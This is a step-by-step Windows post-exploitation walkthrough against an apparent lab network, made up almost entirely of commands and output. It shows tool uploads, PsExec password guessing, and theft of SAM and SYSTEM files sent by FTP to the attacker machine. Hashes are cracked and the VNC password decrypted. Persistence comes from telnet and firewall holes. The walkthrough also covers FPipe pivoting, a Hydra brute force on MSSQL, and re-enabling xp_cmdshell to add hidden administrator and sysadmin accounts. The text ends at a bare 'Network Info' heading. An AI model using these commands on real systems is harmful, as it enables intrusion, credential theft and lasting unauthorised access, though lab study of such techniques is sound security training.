Reconnaissance
If you want to win, you must know your environment.
Start by gathering System related information
C:\>systeminfo systeminfo Host Name: XP-INTRANET OS Name: Microsoft Windows XP Professional OS Version: 5.1.2600 Service Pack 3 Build 2600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Uniprocessor Free Registered Owner: User Registered Organization: Product ID: 76487-OEM-0060233-70102 Original Install Date: 3/1/2011, 6:18:31 PM System Up Time: 1 Days, 22 Hours, 31 Minutes, 28 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2800 Mhz BIOS Version: PTLTD - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London Total Physical Memory: 127 MB Available Physical Memory: 28 MB Virtual Memory: Max Size: 2,048 MB Virtual Memory: Available: 2,008 MB Virtual Memory: In Use: 40 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \\XP-INTRANET Hotfix(s): 2 Hotfix(s) Installed. [01]: Q147222 [02]: KB936929 - Service Pack NetWork Card(s): 1 NIC(s) Installed. [01]: VMware Accelerated AMD PCNet Adapter Connection Name: Local Area Connection 2 DHCP Enabled: Yes DHCP Server: 10.0.1.137 IP address(es) [01]: 10.0.1.138From the systeminfo command we can extract detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards.
Next we’ll check the available services
Running Services
C:\>tasklist /svc tasklist /svc Image Name PID Services ========================= ====== ============================================= System Idle Process 0 N/A System 4 N/A smss.exe 536 N/A csrss.exe 592 N/A winlogon.exe 616 N/A services.exe 660 Eventlog, PlugPlay lsass.exe 672 PolicyAgent, ProtectedStorage, SamSs vmacthlp.exe 836 VMware Physical Disk Helper Service logonui.exe 848 N/A svchost.exe 880 DcomLaunch, TermService svchost.exe 968 RpcSs svchost.exe 1060 AudioSrv, Browser, CryptSvc, Dhcp, dmserver, ERSvc, EventSystem, FastUserSwitchingCompatibility, helpsvc, lanmanserver, lanmanworkstation, Netman, Nla, Schedule, seclogon, SENS, SharedAccess, ShellHWDetection, srservice, Themes, TrkWks, W32Time, winmgmt, wscsvc, wuauserv, WZCSVC svchost.exe 1192 Dnscache svchost.exe 1212 LmHosts, RemoteRegistry, SSDPSRV, WebClient spoolsv.exe 1416 Spooler vmtoolsd.exe 1660 VMTools VMUpgradeHelper.exe 1880 VMUpgradeHelper alg.exe 1808 ALG imapi.exe 1604 ImapiService csrss.exe 2692 N/A winlogon.exe 2720 N/A rdpclip.exe 2916 N/A wscntfy.exe 2920 N/A explorer.exe 3032 N/A VMwareTray.exe 3352 N/A logon.scr 2164 N/A cmd.exe 2268 N/A nc.exe 1136 N/A cmd.exe 4008 N/A tasklist.exe 2604 N/A wmiprvse.exe 3496 N/A
Installed Services
C:\>sc query state= all sc query state= all SERVICE_NAME: Alerter DISPLAY_NAME: Alerter TYPE : 20 WIN32_SHARE_PROCESS STATE : 1 STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 SERVICE_NAME: ALG DISPLAY_NAME: Application Layer Gateway Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ... SERVICE_NAME: WinVNC4 DISPLAY_NAME: VNC Server Version 4 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 1 STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ... SERVICE_NAME: xmlprov DISPLAY_NAME: Network Provisioning Service TYPE : 20 WIN32_SHARE_PROCESS STATE : 1 STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
From the information obtain we have a clear picture of the exploited machine, and some system recourses the we can leverage, like the VNC Server seen above.
User Related Information
Current environment settings
C:\>set set ALLUSERSPROFILE=C:\Documents and Settings\All Users APPDATA=C:\Documents and Settings\John\Application Data CLIENTNAME=iMac CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=XP-INTRANET ComSpec=C:\WINDOWS\system32\cmd.exe FP_NO_HOST_CHECK=NO HOMEDRIVE=C: HOMEPATH=\Documents and Settings\John LOGONSERVER=\\XP-INTRANET NUMBER_OF_PROCESSORS=1 OS=Windows_NT Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 8, GenuineIntel PROCESSOR_LEVEL=15 PROCESSOR_REVISION=0208 ProgramFiles=C:\Program Files PROMPT=$P$G SESSIONNAME=RDP-Tcp#4 SystemDrive=C: SystemRoot=C:\WINDOWS TEMP=C:\DOCUME~1\John\LOCALS~1\Temp TMP=C:\DOCUME~1\John\LOCALS~1\Temp USERDOMAIN=XP-INTRANET USERNAME=John USERPROFILE=C:\Documents and Settings\John windir=C:\WINDOWS
Filtering the results
Find Username
C:\>set | find "USERNAME" set | find "USERNAME" USERNAME=John
Find Domain
C:\>set | find "USERDOMAIN" set | find "USERDOMAIN" USERDOMAIN=XP-INTRANET
Find Current User Information
C:\>net user John net user John User name John Full Name John Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 9/11/2011 1:38 PM Password expires Never Password changeable 9/11/2011 1:38 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 9/13/2011 8:15 PM Logon hours allowed All Local Group Memberships *Remote Desktop Users *Users Global Group memberships *None The command completed successfully.
Current User Privileges
... Local Group Memberships *Remote Desktop Users *Users Global Group memberships *None
Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Jack The command completed successfully.Note
Users accounts other than the Administrator tend to have weaker passwords, so take note of the Jack account.
Privilege Escalation
Upload some useful tools using FTP
Upload some useful tools using FTP
C:\>cd C:\Docume~1\John cd C:\Docume~1\John C:\DOCUME~1\John>echo Bob>ftp.src echo Bob>ftp.src C:\DOCUME~1\John>echo bobisyouruncle>>ftp.src echo bobisyouruncle>>ftp.src C:\DOCUME~1\John>echo bin>>ftp.src echo bin>>ftp.src C:\DOCUME~1\John>echo get PsExec.exe>>ftp.src echo get PsExec.exe>>ftp.src C:\DOCUME~1\John>echo get nc.exe>>ftp.src echo get nc.exe>>ftp.src C:\DOCUME~1\John>echo get FPipe.exe>>ftp.src echo get FPipe.exe>>ftp.src C:\DOCUME~1\John>echo get PassList.txt>>ftp.src echo get PassList.txt>>ftp.src C:\DOCUME~1\John>echo bye>>ftp.src echo bye>>ftp.src C:\DOCUME~1\John>dir dir Volume in drive C has no label. Volume Serial Number is CC58-320F Directory of C:\DOCUME~1\John 09/16/2011 11:44 AM <DIR> . 09/16/2011 11:44 AM <DIR> .. 09/15/2011 01:44 AM <DIR> Desktop 09/11/2011 05:35 PM <DIR> Favorites 09/16/2011 11:42 AM 69 ftp.src 09/14/2011 11:51 AM <DIR> My Documents 03/01/2011 07:10 PM <DIR> Start Menu 1 File(s) 73 bytes 6 Dir(s) 2,913,312,768 bytes free
Run the FTP client
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174 ftp -s:ftp.src 10.0.1.174 User (10.0.1.174:(none)): bin get PsExec.exe get nc.exe get FPipe.exe get PassList.txt bye C:\DOCUME~1\John>del ftp.src del ftp.src
Password Guessing with PsExec
Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i ***************** FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i ***************** 123456 12345 123456789 password Password iloveyou P4ssw0rd1 princess rockyou Password123 1234567 12345678 abc123 P4ssw0rd Nicole Simplepass Daniel MyPass1 babygirl monkey Jessica Lovely michael Ashley Secret1 ***************** Secret1 ***************** 654321 QwertyPassword for Jack: Secret1
Grabbing the Sam and System files
Sam File
C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\" psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\" PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com cmd.exe exited with error code 0.
System File
C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\" psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\" PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com cmd.exe exited with error code 0.
Make file containing FTP commands
C:\DOCUME~1\John>echo Bob>ftp.src echo Bob>ftp.src C:\DOCUME~1\John>echo toor>>ftp.src echo toor>>ftp.src C:\DOCUME~1\John>echo bin>>ftp.src echo bin>>ftp.src C:\DOCUME~1\John>echo put sam>>ftp.src echo put sam>>ftp.src C:\DOCUME~1\John>echo put system>>ftp.src echo put system>>ftp.src C:\DOCUME~1\John>echo bye>>ftp.src echo bye>>ftp.src
Uploading the files to the attacker machine
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174 ftp -s:ftp.src 10.0.1.174 User (10.0.1.174:(none)): bin put sam put system bye
Password Cracking
Extract Hashes from the sam and system file with samdump2
root@bt:~# samdump2 sam system >hashes.txt samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : SAM root@bt:~# cat hashes.txt Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::
Password cracking with John the Ripper using a wordlist
root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) Secret1 (Jack) Simplepass (John) P4ssw0rd (Administrator) guesses: 3 time: 0:00:00:00 100.00% (ETA: Fri Sep 16 21:53:18 2011) c/s: 5591K trying: Skidoing - Zhongguing
Passwords found:
Jack - Secret1
John - Simplepass
Administrator - P4ssw0rd
Persistence
Start stopped Services to maintain access
Back to the VNC Server Version 4 found previously.
Check the service state
C:\DOCUME~1\John>sc query WinVNC4 sc query WinVNC4 SERVICE_NAME: WinVNC4 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 1 STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
Start the service
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start WinVNC4 psexec -u Jack -p Secret1 sc start WinVNC4 PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com sc exited with error code 0.
Check the service state
C:\DOCUME~1\John>sc query WinVNC4 sc query WinVNC4 SERVICE_NAME: WinVNC4 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE,NOT_PAUSABLE,ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
Grab VNC Password
C:\DOCUME~1\John>psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com reg exited with error code 0.
View encrypted VNC Password
C:\DOCUME~1\John>type vnc.reg type vnc.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] "Password"=hex:79,9a,a1,cb,85,e9,79,db "SecurityTypes"="VncAuth" "ReverseSecurityTypes"="None" "QueryConnect"=dword:00000000 "QueryOnlyIfLoggedOn"=dword:00000000
VNC hash 799aa1cb85e979db
Decrypt the VNC hash in the attacker machine with vncdec.exe
C:\>vncdec.exe 799aa1cb85e979db ---------------------------------- RealVNC Password Decrypter by Jonas Piela, www.jonaspiela.de ---------------------------------- running in hash mode... ---------------------------------- decrypted password: VNCPass ----------------------------------
Testing the connection with vncviewer
root@bt:~# vncviewer 10.0.1.138 Connected to RFB server, using protocol version 3.8 Performing standard VNC authentication Password: Authentication successful Desktop name "XP-INTRANET" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using shared memory PutImage
Enable telnet server on the target machine
Note: I advise against using telnet as a persistence method, because telnet transmits data in plain readable text. Use SSH instead, in these example the goal is to introduce the least amount of tools on the targets machines, so I'll use telnet.
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc config tlntsvr start= auto psexec -u Jack -p Secret1 sc config tlntsvr start= auto PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com sc exited with error code 0.
Start the Telnet server
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start tlntsvr psexec -u Jack -p Secret1 sc start tlntsvr PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com sc exited with error code 0..
Add rule to firewall
C:\DOCUME~1\John>psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174 psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174 PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com netsh exited with error code 0.
Telnet to target machine
root@bt:~# telnet 10.0.1.138 Trying 10.0.1.138... Connected to 10.0.1.138. Escape character is '^]'. Welcome to Microsoft Telnet Service login: Jack password: *===================================== Welcome to Microsoft Telnet Server. *===================================== C:\Documents and Settings\Jack>
More Recon & Mapping
Gather Network Information
C:\Documents and Settings\Jack>cd C:\ C:\>ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : XP-INTRANET Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : lab2-intranet Ethernet adapter Local Area Connection 1: Connection-specific DNS Suffix . : lab2-intranet Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-0C-29-B3-5C-13 Dhcp Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 10.0.1.138 Subnet Mask . . . . . . . . . . . : 255.255.255.248 Default Gateway . . . . . . . . . : 10.0.1.137 DHCP Server . . . . . . . . . . . : 10.0.1.137 DNS Servers . . . . . . . . . . . : 10.0.1.137 Lease Obtained. . . . . . . . . . : Saturday, September 17, 2011 5:23:04 PM Lease Expires . . . . . . . . . . : Saturday, September 17, 2011 7:23:04 PM
Gather DNS Information
C:\>ipconfig /displaydns Windows IP Configuration 1.0.0.127.in-addr.arpa ---------------------------------------- Record Name . . . . . : 1.0.0.127.in-addr.arpa. Record Type . . . . . : 12 Time To Live . . . . : 553930 Data Length . . . . . : 4 Section . . . . . . . : Answer PTR Record . . . . . : localhost 174.1.0.10.in-addr.arpa ---------------------------------------- Name does not exist. localhost ---------------------------------------- Record Name . . . . . : localhost Record Type . . . . . : 1 Time To Live . . . . : 553930 Data Length . . . . . : 4 Section . . . . . . . : Answer A (Host) Record . . . : 127.0.0.1
Find Shared Computers and Resources
C:\>net view Server Name Remark ------------------------------------------------------------------------------- \\SERVER-2003 Server 2003 \\XP-INTRANET Windows-XP The command completed successfully.
Finding more Information about the Server-2003 machine
C:\>nslookup SERVER-2003 *** pfsense.lab2-intranet can't find SERVER-2003: Non-existent domain Server: pfsense.lab2-intranet Address: 10.0.1.137
No luck here, let's try using arp
C:\>arp -a arp -a Interface: 10.0.1.138 --- 0x2 Internet Address Physical Address Type 10.0.1.137 00-0c-29-8d-ca-6f dynamic
Use the arp command with * to delete all hosts and initiate a connection to the Server-2003 machine
C:\>arp -d C:\>net use \\SERVER-2003 net use \\SERVER-2003 Enter the user name for 'SERVER-2003': System error 1223 has occurred. The operation was canceled by the user. The password or user name is invalid for \\SERVER-2003.
Check the arp table again, and if the network isn't to busy we should have the Server-2003 machine IP address
C:\>arp -a Interface: 10.0.1.138 --- 0x2 Internet Address Physical Address Type 10.0.1.137 00-0c-29-8d-ca-6f dynamic 10.0.1.140 00-0c-29-c0-07-e4 dynamic
We got lucky the Server 2003 IP address is 10.0.1.140
Let's Port Scan the Server 2003 machine
C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.140 %i | find "[%i]" Server appears to be running on port(s) [21] Server appears to be running on port(s) [53] Server appears to be running on port(s) [80] Server appears to be running on port(s) [135] Server appears to be running on port(s) [139] Server appears to be running on port(s) [445] Server appears to be running on port(s) [1025] Server appears to be running on port(s) [1026] Server appears to be running on port(s) [1032] Server appears to be running on port(s) [1200] Server appears to be running on port(s) [1433] Server appears to be running on port(s) [3389] Server appears to be running on port(s) [5800] Server appears to be running on port(s) [5900]Open ports found: 21, 53, 80, 135, 139, 445, 1025, 1026, 1032, 1200, 1433, 3389, 5800, 5900.
Let's check port 1433
Pivoting
Port Redirection with FPipe
Add rule to firewall
C:\>netsh firewall add portopening protocol = TCP port = 5555 name = PortForward mode = enable scope = custom address = 10.0.1.174 Ok.
Redirect local port 5555 to the 1433 port on the Server 2003 machine
C:\DOCUME~1\John>FPipe.exe -L 5555 -r 1433 10.0.1.140 FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
Password Guessing with THC-Hydra
root@bt:~# hydra -s 5555 -V -l sa -P PassList.txt -t 1 -w 60 -f 10.0.1.138 mssql Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-18 05:04:16 [DATA] 1 tasks, 1 servers, 28 login tries (l:1/p:28), ~28 tries per task [DATA] attacking service mssql on port 5555 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "sa" - child 0 - 1 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456" - child 0 - 2 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345" - child 0 - 3 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456789" - child 0 - 4 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password" - child 0 - 5 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "iloveyou" - child 0 - 6 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "P4ssw0rd1" - child 0 - 7 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "princess" - child 0 - 8 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "rockyou" - child 0 - 9 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password123" - child 0 - 10 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "1234567" - child 0 - 11 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345678" - child 0 - 12 of 28 [ATTEMPT] target 10.0.1.138 - login "sa" - pass "password1" - child 0 - 13 of 28 [5555][mssql] host: 10.0.1.138 login: sa password: password1 [STATUS] attack finished for 10.0.1.138 (valid pair found) Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-18 05:04:19login: sa password: password1
Stored Procedure Attack using tsql
Connecting to the SQL service
root@bt:~# tsql -H 10.0.1.138 -U sa -p 5555 locale is "en_US.UTF-8" locale charset is "UTF-8" Password: 1> exec xp_cmdshell 'whoami'; 2> go Msg 15281, Level 16, State 1, Server SERVER-2003\SQLEXPRESS, Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
Using sp_configure to reenable the stored procedure
1> EXEC sp_configure 'show advanced options',1 2> go Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163 Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0) 1> RECONFIGURE 2> go 1> EXEC sp_configure 'xp_cmdshell',1 2> go Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163 Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0) 1> RECONFIGURE 2> go 1> exec xp_cmdshell 'whoami'; 2> go output nt authority\system NULL (2 rows affected) (return status = 0) 1> xp_msver 'ProductName' 2> go Index Name Internal_Value Character_Value 1 ProductName NULL Microsoft SQL Server (1 row affected) (return status = 1)
Adding a Local Administrator
Username: IWAM_NETASPS Password: $ecretP4$$
1> xp_cmdshell 'net user IWAM_NETASPS $ecretP4$$ /add' 2> go output The command completed successfully. NULL NULL (3 rows affected) (return status = 0) 1> xp_cmdshell 'net localgroup administrators IWAM_NETASPS /add' 2> go output The command completed successfully. NULL NULL (3 rows affected) (return status = 0)
Persistence - Keeping sysadmin-Level access
Username: iKuppu Password: 123P4$$
1> sp_addlogin 'iKuppu','123P4$$' 2> go (return status = 0) 1> sp_addsrvrolemember 'iKuppu','sysadmin' 2> go (return status = 0)
Grab the SAM and System files stored in the Registry from Server 2003
Back to the XP machine
First, set up a SMB session
C:\DOCUME~1\John>net use \\SERVER-2003 $ecretP4$$ /u:IWAM_NETASPS The command completed successfully.
Find a Shared Folder
C:\DOCUME~1\John>net view \\SERVER-2003 Shared resources at \\SERVER-2003 Server 2003 Share name Type Used as Comment ------------------------------------------------------------------------------- FTP Disk Shares Disk The command completed successfully.
C:\DOCUME~1\John>net use * \\SERVER-2003\Shares Drive Z: is now connected to \\SERVER-2003\Shares. The command completed successfully.
Now let's use the PsExec command to connect to the Server 2003 machine and copy the files with the reg command
C:\DOCUME~1\John>psexec \\SERVER-2003 -u IWAM_NETASPS -p $ecretP4$$ cmd.exe PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd C:\ C:\>dir Volume in drive C has no label. Volume Serial Number is 7083-1B0B Directory of C:\ 09/11/2011 09:58 PM 0 AUTOEXEC.BAT 09/11/2011 09:58 PM 0 CONFIG.SYS 05/29/2011 10:52 PM <DIR> Documents and Settings 09/12/2011 12:08 AM <DIR> FPSE_search 06/01/2011 04:52 AM <DIR> FTP 09/11/2011 05:44 PM <DIR> Inetpub 05/29/2011 04:41 AM <DIR> Program Files 06/04/2011 04:34 AM <DIR> Shares 06/04/2011 04:56 AM <DIR> WINDOWS 09/11/2011 09:59 PM <DIR> wmpub 3 File(s) 61,440 bytes 8 Dir(s) 5,891,756,032 bytes free C:\>cd Shares C:\Shares>reg save HKLM\SAM SAM The operation completed successfully. C:\Shares>reg save HKLM\System System The operation completed successfully. C:\Shares>exit cmd.exe exited on SERVER-2003 with error code 0.
The last step is to upload the files to the attacker machine
C:\DOCUME~1\John>ftp 10.0.1.174 Connected to 10.0.1.174. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 12:01. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. User (10.0.1.174:(none)): Bob 331 User Bob OK. Password required Password: 230-User Bob has group access to: 1001 230 OK. Current directory is /
ftp> bin 200 TYPE is now 8-bit binary ftp> put Z:\SAM 200 PORT command successful 150 Connecting to port 5001 226-File successfully transferred 226 0.089 seconds (measured here), 451.25 Kbytes per second ftp: 40960 bytes sent in 0.01Seconds 2730.67Kbytes/sec. ftp> put Z:\System 200 PORT command successful 150 Connecting to port 5002 226-File successfully transferred 226 3.300 seconds (measured here), 0.69 Mbytes per second ftp: 2404352 bytes sent in 3.20Seconds 750.42Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 2385 and downloaded 0 kbytes. 221 Logout.
New target, so let's go back to Reconnaissance
System Information Gathering
OS Information
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion Name ServicePackMajorVersion Microsoft Windows Server 2003 Standard Edition|C:\WINDOWS|\Device\Harddisk0\Partition1 2
Installed Software
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version Name Version Microsoft SQL Server VSS Writer 9.00.1399.06 Microsoft SQL Server Management Studio Express 9.00.2047.00 Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) 9.00.1399.06 MSXML 6.0 Parser 6.00.3883.8 Microsoft .NET Framework 2.0 2.0.50727 Microsoft SQL Server Setup Support Files (English) 9.00.1399.06 Microsoft SQL Server Native Client 9.00.1399.06
Running Process
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief HandleCount Name Priority ProcessId ThreadCount WorkingSetSize 0 System Idle Process 0 0 1 16384 1569 System 8 4 55 217088 31 smss.exe 11 240 2 458752 481 csrss.exe 13 300 10 3317760 526 winlogon.exe 13 332 24 10756096 329 services.exe 9 384 17 3985408 571 lsass.exe 9 396 30 9371648 161 svchost.exe 8 588 7 5005312 285 svchost.exe 8 660 10 3923968 137 svchost.exe 8 728 7 4132864 171 svchost.exe 8 780 13 5689344 1025 svchost.exe 8 796 45 17334272 131 spoolsv.exe 8 988 13 4653056 168 msdtc.exe 8 1040 14 4648960 391 cisvc.exe 8 1128 23 204800 162 dns.exe 8 1176 12 4661248 73 svchost.exe 8 1216 2 2547712 336 inetinfo.exe 8 1268 16 10919936 370 sqlservr.exe 8 1316 29 20021248 57 svchost.exe 8 1416 2 2183168 158 snmp.exe 8 1560 6 5033984 87 sqlbrowser.exe 8 1624 9 3080192 86 winvnc4.exe 8 1760 4 3997696 158 svchost.exe 8 1892 15 5857280 236 svchost.exe 8 2096 25 4702208 97 alg.exe 8 2248 5 3239936 353 wmiprvse.exe 8 2308 7 11517952 121 csrss.exe 13 2596 10 3239936 232 winlogon.exe 13 2624 14 3043328 83 rdpclip.exe 8 2780 4 1298432 366 explorer.exe 8 2880 10 5459968 275 mmc.exe 8 3148 8 3489792 96 cidaemon.exe 4 3232 3 249856 153 cidaemon.exe 4 3304 5 487424 115 cidaemon.exe 4 3340 4 262144 47 notepad.exe 8 2448 2 614400 40 logon.scr 4 276 2 2248704 124 csrss.exe 13 3592 10 19582976 228 winlogon.exe 13 3816 15 3239936 86 rdpclip.exe 8 3964 5 1282048 260 explorer.exe 8 1188 8 3506176 71 cmd.exe 8 3636 2 942080 39 scrnsave.scr 4 3352 2 1798144 136 wmiprvse.exe 8 3712 9 5275648
Local Drives Info
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get description,name,freespace,size Description FreeSpace Name Size 3 1/2 Inch Floppy Drive A: Local Fixed Disk 5958295552 C: 8578932736 CD-ROM Disc 0 D: 623075328
Shares Info
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table AccessMask AllowMaximum Description InstallDate MaximumAllowed Name Path Status Type TRUE FTP C:\FTP OK 0 TRUE Default share C$ C:\ OK -2147483648 TRUE Remote IPC IPC$ OK -2147483645 TRUE Remote Admin ADMIN$ C:\WINDOWS OK -2147483648
Network Info
